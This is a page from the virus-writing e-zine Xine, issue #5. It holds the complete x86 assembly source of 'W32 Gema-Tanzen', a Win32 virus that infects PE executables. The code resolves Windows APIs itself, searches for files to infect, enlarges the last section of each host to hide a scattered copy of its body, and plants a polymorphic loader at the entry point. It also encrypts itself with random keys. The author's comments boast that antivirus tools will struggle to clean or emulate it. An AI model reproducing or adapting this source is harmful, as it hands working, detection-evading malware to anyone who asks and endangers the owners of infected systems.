Copy Link
Add to Bookmark
Report
Xine - issue #5 - Phile 211
Ú-----------------------------¿
| Xine - issue #5 - Phile 211 |
À-----------------------------Ù
;---------------------------- W32 GEMA-TANZEN BY HenKy -----------------------------
;
;-AUTHOR: HenKy
;
;-MAIL: HenKy_@latinmail.com
;
;-ORIGIN: SPAIN
;
;-TODO: 30/10/00 - 7/10/00
;
; NOT FULLY POLYMORPHIC... ANOTHER UNFINISHED POLY... WAIT MY META X/
; DO NOT MODIFY ORIGINAL EIP (EPO)
; NEED NEW ALGORITHM TO CLEAN (AVERS WILL HATE IT)
; IS NOT ENCRYPTED (CRYPTANALISYS SUX)
; HARD TO EMULATE
; QUITE STABLE (AT LEAST IN MY TESTS) IN W32
; HARD TO DISASM (SURE ? XDDD )
; ONLY RUNTIME CURRENT DIR (IM LIMITED TO STACK SIZE)
.586P
.MODEL FLAT
LOCALS
EXTRN ExitProcess:PROC
MIX_SIZ EQU FILE_END-MEGAMIX
MIX_MEM EQU MEM_END-MEGAMIX
NABLA EQU DELTA-MEGAMIX
MARKA EQU 66
FLAGZ EQU 00000020H OR 20000000H OR 80000000H
MAX_PATH EQU 260
MACROSIZE MACRO
DB MIX_SIZ/01000 mod 10 + "0"
DB MIX_SIZ/00100 mod 10 + "0"
DB MIX_SIZ/00010 mod 10 + "0"
DB MIX_SIZ/00001 mod 10 + "0"
ENDM
.DATA
DB 'MY BEST VIRUS SO FAR... GEMA TANZEN SO FAR !!! '
DB 'GREETZ TO VX-OBSCENE...'
.CODE
FAKE:
CALL DELTA2
DELTA2: POP EBP
SUB ESP,MIX_MEM
MOV ECX,MIX_MEM
LEA ESI,[EBP+MEGAMIX-DELTA2]
MOV EDI,ESP
REP MOVSB
JMP ESP
MEGAMIX:
MOV EAX, [ESP+MIX_MEM]
CALL DELTA
DELTA:
XOR AX, AX
F_BASE:
CMP BYTE PTR [EAX], "M"
JE FLAGO
SUB EAX, 1000H
JMP F_BASE
DB 'GEMA TANZEN SO FAR!'
FLAGO:
MOV EBX, [EAX+3Ch]
ADD EBX, EAX
MOV EBX, [EBX+120]
ADD EBX, EAX ; BEST METHOD :P
MOV ESI, [EBX+(3*4)]
ADD ESI, EAX
MOV EDX, [EBX+(8*4)]
ADD EDX, EAX
MOV ECX, [EBX+(6*4)]
DEC ECX
POP EBP
FIND_GPA:
MOV EDI, [EDX+(ECX*4)]
ADD EDI, EAX
PUSHAD
CALL GAP
DB "GetProcAddress",0
GAP:
POP ESI
PUSH 15
POP ECX
REPE CMPSB
POPAD
JNE LOOP_FGPA
MOV ESI, [EBX+(9*4)]
ADD ESI, EAX
MOVZX ESI, WORD PTR [ESI+(ECX*2)]
MOV EBX, [EBX+(7*4)]
ADD EBX, EAX
LEA EBX, [EBX+(ESI*4)]
MOV ESI, [EBX]
ADD ESI, EAX
MOV [EBP+GPA-DELTA], ESI
LOOP_FGPA:
LOOP FIND_GPA
XCHG EBX, EAX
LEA ESI, [EBP+APIs-DELTA]
LEA EDI, [EBP+APIaddresses-DELTA]
GPI: PUSH ESI
PUSH EBX
CALL [EBP+GPA-DELTA]
CLD
STOSD
NPI:
LODSB
OR AL, AL
JNZ SHORT NPI
CMP [ESI], AL
JNZ GPI
INFECT:
LEA EAX, [EBP+OFFSET Win32FindData-DELTA]
PUSH EAX
LEA EAX, [EBP+OFFSET IMASK-DELTA]
PUSH EAX
CALL DWORD PTR [EBP+FindFirstFile-DELTA]
MOV DWORD PTR [EBP+SearcHandle-DELTA],EAX
LOOPER:
INC EAX
JZ WARNING
DEC EAX
OR EAX,EAX
JNZ ALLKEY
WARNING:
MOV EAX,00001000H
OLD_EIP EQU $-4
ADD EAX,00400000H
BASE EQU $-4
PUSH EAX
MOV EDI,[EBP+BASE-DELTA]
ADD EDI,[EBP+OLD_EIP-DELTA]
LEA ESI,[EBP+SALVANTE-DELTA]
MOV ECX,CARGADOR_SIZ
REP MOVSB
INTERPRETE:
MOV EDX,[EBP+LASTO-DELTA]
MOV ECX,MIX_SIZ/4
PAZZ:
ROL BYTE PTR [EDX+(4*MIX_SIZ)],12H
DKEY4 EQU $-1
ADD DWORD PTR [EDX+(4*MIX_SIZ)],12345678H
DKEY3 EQU $-4
ROR BYTE PTR [EDX+(4*MIX_SIZ)],12H
DKEY2 EQU $-1
XOR DWORD PTR [EDX+(4*MIX_SIZ)],12345678H
DKEY1 EQU $-4
ADD EDX,4
LOOP PAZZ
GODAMM_BUG:
MOV EDX,12345678H
LASTO EQU $-4
MOV ECX,MIX_SIZ
MOV ESI,EDX
ADD ESI,(4*MIX_SIZ)
ZENTRAL:
MOV EDI,[EDX]
ADD EDX,4
MOVSB
LOOP ZENTRAL
ESTO_ES_CUTRE_BASTARDO:
POP EAX
ADD ESP,MIX_MEM
JMP EAX
ALLKEY:
PUSH CARGADOR_SIZ
XOR ECX,ECX
PUSH ECX
CALL DWORD PTR [EBP+GlobalAlloc-DELTA]
PUSH EAX
LEA ESI,[EBP+SALVANTE-DELTA]
MOV ECX,CARGADOR_SIZ
MOV EDI,EAX
REP MOVSB
PUSH DWORD PTR [EBP+OLD_EIP-DELTA]
PUSH DWORD PTR [EBP+BASE-DELTA]
PUSH DWORD PTR [EBP+LASTO-DELTA]
PUSH DWORD PTR [EBP+DKEY1-DELTA]
PUSH DWORD PTR [EBP+DKEY2-DELTA]
PUSH DWORD PTR [EBP+DKEY3-DELTA]
PUSH DWORD PTR [EBP+DKEY4-DELTA]
CDQ
PUSH EDX
PUSH 80h
PUSH 3
PUSH EDX
PUSH EDX
PUSH 0C0000000h
LEA EAX ,[EBP+offset FNAME-DELTA] ; OPEN IT!
PUSH EAX
CALL DWORD PTR [EBP+CreateFile-DELTA]
INC EAX
JZ Cerrar
DEC EAX
MOV DWORD PTR [EBP+FileHandle-DELTA],EAX ; SAVE HNDL
MOV ECX, DWORD PTR [EBP+WFD_nFileSizeLow-DELTA]
CMP ECX,(50*1024)
JB Cerrar
CALL CreateMap ; CREATE A MAP
MOV DWORD PTR [EBP+MapHandle-DELTA],EAX
MOV ECX, DWORD PTR [EBP+WFD_nFileSizeLow-DELTA]
CALL MapFile ; MEMORY PROYECTION
MOV DWORD PTR [EBP+MapAddress-DELTA],EAX
MOV ESI,EAX ; GET PE HDR
MOV ESI,[EAX+3CH]
ADD ESI,EAX
CMP BYTE PTR [ESI],"P" ; IS A 'P'E ?
JNZ Cerrar
CMP BYTE PTR [ESI+MARKA],"H" ; HenKy IS HERE ?
JZ Cerrar
PUSHAD
MOV EBX,[ESI+74H]
SHL EBX,3 ; MAKE FIRST SECTION WRITEABLE
ADD ESI,78H
ADD ESI,EBX
OR DWORD PTR [ESI+24H],FLAGZ
MOV EAX,DWORD PTR [ESI+8]
MOV [EBP+SEC_SIZ-DELTA],EAX
MOV EAX,[ESI+12] ; RVA
MOV [EBP+SEC_EIP-DELTA],EAX
MOV ECX,[ESI+20]
MOV EAX,[ESI+12]
SUB EAX,ECX
MOV DWORD PTR [EBP+SUBBER-DELTA],EAX
POPAD
PUSH DWORD PTR [ESI+3CH]
PUSH DWORD PTR [EBP+MapAddress-DELTA] ; CLOSE
CALL DWORD PTR [EBP+UnmapViewOfFile-DELTA]
PUSH DWORD PTR [EBP+MapHandle-DELTA]
CALL DWORD PTR[EBP+CloseHandle-DELTA]
POP ECX
MOV EAX,DWORD PTR [EBP+WFD_nFileSizeLow-DELTA] ; MAP AGAIN WIHT VIRSIZE
ADD EAX,(MIX_SIZ*5)
CALL Align
XCHG ECX,EAX
MOV DWORD PTR [EBP+NewSize-DELTA],ECX
CALL CreateMap
MOV DWORD PTR [EBP+MapHandle-DELTA],EAX
MOV ECX,DWORD PTR [EBP+NewSize-DELTA]
CALL MapFile
MOV DWORD PTR [EBP+MapAddress-DELTA],EAX ; AGAIN
MOV ESI,[EAX+3CH]
ADD ESI,EAX
MOV EDI,ESI
MOVZX EAX,WORD PTR [EDI+06H]
DEC EAX
IMUL EAX,EAX,28H
ADD ESI,EAX
ADD ESI,78H
MOV EDX,[EDI+74H]
SHL EDX,3
ADD ESI,EDX
MOV ECX,[EDI+3CH]
MOV EBX,[EDI+56]
CMP ECX,EBX
JNZ NIXX
CDQ
MOV [EBP+SUBBER-DELTA],EDX
NIXX:
MOV EAX,[EDI+28H]
MOV DWORD PTR [EBP+OLD_EIP-DELTA],EAX ;SAVE OLD EIP
SUB DWORD PTR [EBP+SEC_SIZ-DELTA],EAX
MOV EDX,[ESI+10H]
MOV EBX,EDX
ADD EDX,[ESI+14H]
PUSH EDX
MOV EAX,EBX
ADD EAX,[ESI+0CH]
ADD EAX,[EDI+34H]
MOV [EBP+LASTO-DELTA],EAX
MOV [EBP+LASTO2-DELTA],EAX
MOV EAX,[EDI+34H] ; IMAGE BASE
MOV [EBP+BASE-DELTA],EAX
MOV EAX,[ESI+10H]
ADD EAX,(5*MIX_SIZ)
MOV ECX,[EDI+3CH]
CALL Align
MOV [ESI+10H],EAX ;NEW PHYSSIZE
MOV [ESI+08H],EAX ;NEW VIRTSIZE
POP EDX
MOV EAX,[ESI+10H]
ADD EAX,[ESI+0CH]
MOV [EDI+50H],EAX ; NEW IMAGESIZE
OR DWORD PTR [ESI+24H],FLAGZ
MOV BYTE PTR [EDI+MARKA],"H" ; HenKy!
ADD EDX,DWORD PTR [EBP+MapAddress-DELTA]
MOV EBX,[EBP+OLD_EIP-DELTA]
ADD EBX,[EBP+MapAddress-DELTA]
SUB EBX,12345678H
SUBBER EQU $-4
PUSHAD
MOV ESI,[EDI+28H] ; SAVE OLD DATA
ADD ESI,DWORD PTR [EBP+MapAddress-DELTA]
SUB ESI,[EBP+SUBBER-DELTA]
LEA EDI,[EBP+SALVANTE-DELTA]
PUSH CARGADOR_SIZ
POP ECX
REP MOVSB
POPAD
;TINY POLYMORPHIC GENERATOR
PUSHAD
LEA EDI,[EBP+CARGADOR-DELTA]
MOV EAX,2
CALL PRANDOM32
CMP AL,1
JNE CHINCHETA1
MOV EAX,0EC81H
STOSW
MOV EAX,MIX_MEM
STOSD
JMP NEXT2
CHINCHETA1:
MOV EAX,0C481H
STOSW
MOV EAX,-MIX_MEM
STOSD
NEXT2: MOV EAX,2
CALL PRANDOM32
CMP AL,1
JNE PROTESIS_RARA
MOV EAX,0FC8BH
STOSW
JMP NEXT3
PROTESIS_RARA:
MOV EAX,05F54H
STOSW
NEXT3:
MOV EAX,2
CALL PRANDOM32
CMP AL,1
JNE BOMBAS_BOMBAS
MOV AL,0BBH
STOSB
MOV EAX,[EBP+LASTO-DELTA]
STOSD
JMP NEXT4
BOMBAS_BOMBAS:
MOV AL,'h'
STOSB
MOV EAX,[EBP+LASTO-DELTA]
STOSD
MOV AL,05BH
STOSB
NEXT4:
MOV EAX,2
CALL PRANDOM32
CMP AL,1
JNE BUZEFALO
MOV AL,0B9H
STOSB
MOV EAX,MIX_SIZ
STOSD
JMP NEXT5
BUZEFALO:
MOV AL,'h'
STOSB
MOV EAX,MIX_SIZ
STOSD
MOV AL,059H
STOSB
NEXT5: MOV EAX,2
CALL PRANDOM32
CMP AL,1
JNE ESTO_ES_ABURRIDO
MOV AL,90H
STOSB
MOV EAX,0338BH
STOSW
JMP NEXT6
ESTO_ES_ABURRIDO:
MOV EAX,0338BH
STOSW
MOV AL,90H
STOSB
NEXT6:
MOV EAX,2
CALL PRANDOM32
CMP AL,1
JNE CAIMAN
MOV EAX,0C383H
STOSW
MOV AL,04H
STOSB
JMP NEXT7
CAIMAN:
MOV EAX,0EB83H
STOSW
MOV AL,0FCH
STOSB
NEXT7:
MOV EAX,2
CALL PRANDOM32
CMP AL,1
JNE BABOSERA
MOV EAX,090A4H
STOSW
JMP NEXT8
BABOSERA:
MOV EAX,0AAACH
STOSW
NEXT8:
MOV EAX,2
CALL PRANDOM32
CMP AL,1
JNE BABOSERAR
MOV EAX,0F6E2H
STOSW
JMP NEXT9
BABOSERAR:
MOV EAX,0F6E0H
STOSW
NEXT9:
MOV EAX,2
CALL PRANDOM32
CMP AL,1
JNE BABOSERARR
MOV EAX,0E4FFH
STOSW
JMP NEXT10
BABOSERARR:
MOV EAX,0C354H
STOSW
NEXT10:
POPAD
PUSHAD
MOV EDI,[EDI+28H] ; WRITE NEW DATA
ADD EDI,DWORD PTR [EBP+MapAddress-DELTA]
SUB EDI,[EBP+SUBBER-DELTA]
CALL SMART1
; POLYMORPHIC LOADER
CARGADOR:
SUB ESP,MIX_MEM
MOV EDI,ESP
MOV EBX,12345678H
MOV ECX,MIX_SIZ
TECHNICS:
NOP
MOV ESI,[EBX]
ADD EBX,4
MOVSB
NOP
NOP
LOOP TECHNICS
JMP ESP
NOP
NOP
NOP
CARGADOR_SIZ EQU $-CARGADOR
SMART1:
POP ESI
PUSH CARGADOR_SIZ
POP ECX
REP MOVSB
POPAD
PUSHAD
CALL RANDOM32
MOV [EBP+CKEY1-DELTA],EAX
MOV [EBP+DKEY1-DELTA],EAX
CALL RANDOM32
MOV [EBP+CKEY2-DELTA],AL
MOV [EBP+DKEY2-DELTA],AL
CALL RANDOM32
MOV [EBP+CKEY3-DELTA],EAX
MOV [EBP+DKEY3-DELTA],EAX
CALL RANDOM32
MOV [EBP+CKEY4-DELTA],AL
MOV [EBP+DKEY4-DELTA],AL
POPAD
;EDX:INCREASED L.SEC EBX:FIRST SECTION
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\/////////////////////////////////////;
; ;
; ETERNAL MACHINE V (C) HenKy ;
; ;
;///////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\;
GEMA_TANZEN_ENGINE_START:
PUSHAD
MOV EDI,EDX
MOV ECX,MIX_SIZ
JMP PRADO
OROCHI DB 'EternaL MachinE V' ;LONG AWAITED... :)
PARDO: POP ECX
PRADO:
MOV EAX,12345678H
SEC_SIZ EQU $-4
CALL PRANDOM32
ADD EAX,12345678H
SEC_EIP EQU $-4
MOV EBX,[EBP+OLD_EIP-DELTA]
PUSH ECX
MOV ECX,CARGADOR_SIZ
PODRIDO:
CMP EBX,EAX
JE PARDO
INC EBX
LOOP PODRIDO
POP ECX
ADD EAX,[EBP+BASE-DELTA]
PUSHAD
MOV EDI,EDX
MOV ECX,MIX_SIZ
ZERZENA:
CMP DWORD PTR [EDI],EAX
JE OTROX
ADD EDI,4
LOOP ZERZENA
JMP GOOZ
OTROX: POPAD
JMP PRADO
GOOZ:
POPAD
STOSD
LOOP PRADO
MEC_MEC:
MOV EDI,EDX
MOV ESI,EDX
ADD EDI,(MIX_SIZ*4)
MOV ECX,MIX_SIZ
PINTXO:
LODSD
PUSH ESI
SUB EAX,[EBP+BASE-DELTA]
ADD EAX,[EBP+MapAddress-DELTA]
SUB EAX,[EBP+SUBBER-DELTA]
MOV ESI,EAX
MOVSB
POP ESI
LOOP PINTXO
MAC_MAC:
MOV ECX,MIX_SIZ
LEA ESI,[EBP+MEGAMIX-DELTA]
PACO_ANN:
MOV EDI,[EDX]
ADD EDX,4
SUB EDI,[EBP+BASE-DELTA]
ADD EDI,[EBP+MapAddress-DELTA]
SUB EDI,[EBP+SUBBER-DELTA]
MOVSB
LOOP PACO_ANN
POPAD
MOV ECX,MIX_SIZ/4
PASS:
XOR DWORD PTR [EDX+(4*MIX_SIZ)],12345678H
CKEY1 EQU $-4
ROL BYTE PTR [EDX+(4*MIX_SIZ)],12H
CKEY2 EQU $-1
SUB DWORD PTR [EDX+(4*MIX_SIZ)],12345678H
CKEY3 EQU $-4
ROR BYTE PTR [EDX+(4*MIX_SIZ)],12H
CKEY4 EQU $-1
ADD EDX,4
LOOP PASS
UnMapFile:
PUSH DWORD PTR [EBP+MapAddress-DELTA]
CALL DWORD PTR [EBP+UnmapViewOfFile-DELTA]
CloseMap:
PUSH DWORD PTR [EBP+MapHandle-DELTA]
CALL DWORD PTR [EBP+CloseHandle-DELTA]
Cerrar:
POP DWORD PTR [EBP+DKEY4-DELTA]
POP DWORD PTR [EBP+DKEY3-DELTA]
POP DWORD PTR [EBP+DKEY2-DELTA]
POP DWORD PTR [EBP+DKEY1-DELTA]
POP DWORD PTR [EBP+LASTO-DELTA]
POP DWORD PTR [EBP+BASE-DELTA]
POP DWORD PTR [EBP+OLD_EIP-DELTA]
POP EAX
MOV ESI,EAX
MOV ECX,CARGADOR_SIZ
LEA EDI,[EBP+SALVANTE-DELTA]
REP MOVSB
PUSH EAX
CALL DWORD PTR [EBP+GlobalFree-DELTA]
PUSH DWORD PTR [EBP+FileHandle-DELTA]
CALL DWORD PTR [EBP+CloseHandle-DELTA]
TOPO:
LEA EAX, [EBP+offset Win32FindData-DELTA]
PUSH EAX
PUSH DWORD PTR [EBP+SearcHandle-DELTA]
CALL DWORD PTR [EBP+FindNextFile-DELTA]
JMP LOOPER
CreateMap:
CDQ
PUSH EDX
PUSH ECX
PUSH EDX
PUSH 4H
PUSH EDX
PUSH DWORD PTR [EBP+FileHandle-DELTA]
CALL DWORD PTR [EBP+CreateFileMappingA-DELTA]
RET
MapFile:
CDQ
PUSH ECX
PUSH EDX
PUSH EDX
INC EDX
INC EDX
PUSH EDX
PUSH DWORD PTR [EBP+MapHandle-DELTA]
CALL DWORD PTR [EBP+MapViewOfFile-DELTA]
RET
Align:
PUSH EDX
CDQ
PUSH EAX
DIV ECX
POP EAX
SUB ECX,EDX
ADD EAX,ECX
POP EDX
RET
RANDOM32:
PUSH EDX
DB 0FH, 31H
POP EDX
RET
PRANDOM32:
PUSH EDX
PUSH ECX
XOR EDX,EDX
PUSH EAX
CALL RANDOM32
POP ECX
DIV ECX
XCHG EAX, EDX
POP ECX
POP EDX
RET
LASTO2 DD 0
APIs:
DB "CreateFileA",0
DB "CloseHandle",0
DB "FindFirstFileA",0
DB "FindNextFileA",0
; ONLY 7 APIZ TO MAKE A VIRII...
DB "MapViewOfFile",0
; AS USUAL...
DB "UnmapViewOfFile",0
; WINDOZE SUCKS! 8-D
DB "CreateFileMappingA",0
DB "GlobalAlloc",0 ; SHIT!!! 2 APIS MORE
DB "GlobalFree",0 ; DUE WEIRD STACK BUG :O
Zero_ DB 0
SALVANTE DB CARGADOR_SIZ DUP (0CCH)
IMASK DB '*.ZZZ',0 ; FOR DEBUGZZZZ
DB 'GEMA-TANZEN VIRUS CODED BY OROCHI HenKy',0
ALIGN 4
FILE_END LABEL BYTE
APIaddresses:
CreateFile DD 0
CloseHandle DD 0
FindFirstFile DD 0
FindNextFile DD 0
MapViewOfFile DD 0
UnmapViewOfFile DD 0
CreateFileMappingA DD 0
GlobalAlloc DD 0
GlobalFree DD 0
GPA DD 0
SearcHandle DD 0
FileHandle DD 0
NewSize DD 0
MapHandle DD 0
MapAddress DD 0
FILETIME STRUC
FT_dwLowDateTime DD ?
FT_dwHighDateTime DD ?
FILETIME ENDS
Win32FindData:
WFD_dwFileAttributes DD ?
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh DD ?
WFD_nFileSizeLow DD ?
WFD_dwReserved0 DD ?
WFD_dwReserved1 DD ?
FNAME DB MAX_PATH DUP (?)
WFD_szAlternateFileName DB 13 DUP (?)
DB 03 DUP (?)
DB 100h dup (0)
ALIGN 4
MEM_END LABEL BYTE
EXITPROC:
PUSH 0
CALL ExitProcess
ENDS
END FAKE
